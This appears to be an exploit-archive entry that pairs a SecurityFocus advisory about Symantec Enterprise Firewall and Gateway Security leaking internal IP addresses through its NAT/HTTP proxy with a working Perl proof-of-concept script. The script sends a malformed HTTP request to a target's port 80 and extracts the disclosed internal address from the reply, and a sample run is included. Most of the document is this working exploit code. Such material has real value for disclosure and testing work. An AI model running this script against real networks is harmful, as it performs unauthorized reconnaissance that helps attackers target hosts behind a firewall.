49 lines
No EOL
1.3 KiB
Perl
Executable file
49 lines
No EOL
1.3 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/17936/info
|
|
|
|
Symantec Enterprise Firewall and Gateway Security products are prone to an information-disclosure weakness.
|
|
|
|
The vendor has reported that the NAT/HTTP proxy component of the products may reveal the internal IP addresses of protected computers.
|
|
|
|
An attacker may use this information to carry out targeted attacks against a potentially vulnerable host.
|
|
|
|
#!/usr/bin/perl
|
|
# [title] raptor firewall internal IP disclosure 'exploit'
|
|
# [mailto] research [at] sec-consult [dot} com
|
|
#
|
|
# sk0L@b4byl0n:~/home/sk0L> perl raptor-nat.pl behind.raptor.com
|
|
# waiting for timeout (this can take about 1 min.)
|
|
# behind.raptor.com: 10.238.94.67
|
|
|
|
use IO::Socket;
|
|
|
|
$| = 1;
|
|
|
|
$host = $ARGV[0] or die "$0 <host>\n";
|
|
|
|
$request = "getXXX/XXX HTTP/1.0\n\n";
|
|
|
|
my $sock = new IO::Socket::INET (
|
|
PeerAddr => $host,
|
|
PeerPort => 80,
|
|
Proto => 'tcp',
|
|
);
|
|
|
|
die "could not open socket: $!\n" unless $sock;
|
|
|
|
print $sock $request;
|
|
|
|
print "waiting for timeout (this can take about 1 min.)\n";
|
|
|
|
while (<$sock>) {
|
|
if ($_ =~ /http:\/\/(\d+\.\d+\.\d+\.\d+)XXX/) {
|
|
$ip = $1;
|
|
}
|
|
}
|
|
|
|
if (defined($ip)) {
|
|
print "$host: $ip\n";
|
|
} else {
|
|
print "failed.\n";
|
|
}
|
|
|
|
close($sock); |